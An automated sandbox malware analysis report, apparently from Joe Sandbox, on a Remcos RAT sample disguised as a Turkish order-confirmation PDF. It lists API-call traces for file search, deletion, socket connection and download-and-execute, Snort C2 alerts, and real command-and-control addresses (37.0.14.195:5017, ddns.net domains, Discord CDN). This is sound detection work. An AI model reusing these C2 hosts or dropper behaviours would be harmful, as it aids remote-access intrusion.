                    Source: Yara matchFile source: 0000000D.00000002.360448965.0000000003AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe PID: 6356, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Eluiezilfw.exe PID: 6880, type: MEMORYSTR
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49751 version: TLS 1.2
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00404C0A
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_0040751B
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr3_2_00410586
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_0040728F
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE3_2_0040477E
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00403325
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_00412BEE
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10548C1E getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose,3_2_10548C1E
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10544CB4 FindFirstFileW,3_2_10544CB4
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1055457D FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose,3_2_1055457D
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1054610D _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread,3_2_1054610D
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10546599 FindFirstFileW,FindNextFileW,FindClose,3_2_10546599
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10548EAA getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose,3_2_10548EAA
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10551F15 FindFirstFileW,3_2_10551F15
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha3_2_00403C4A

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2845323 ETPRO TROJAN MSIL/Remcos RAT CnC Keep-Alive (Outbound) 192.168.2.3:49778 -> 37.0.14.195:5017
                    Source: TrafficSnort IDS: 2844577 ETPRO TROJAN MSIL/Remcos RAT CnC Checkin M2 192.168.2.3:49778 -> 37.0.14.195:5017
                    Source: TrafficSnort IDS: 2845324 ETPRO TROJAN MSIL/Remcos RAT CnC Keep-Alive (Inbound) 37.0.14.195:5017 -> 192.168.2.3:49778
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: Pw`~hustlelord.ddns.net
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: blessmyhustlelord.ddns.net
                    Source: Joe Sandbox ViewASN Name: WKD-ASIE WKD-ASIE
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
                    Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
                    Source: global trafficTCP traffic: 192.168.2.3:49746 -> 37.0.14.195:5017
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1054EE74 URLDownloadToFileW,ShellExecuteW,??3@YAXPAX@Z,3_2_1054EE74
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.269381013.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.269349489.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/.
                    Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/2y
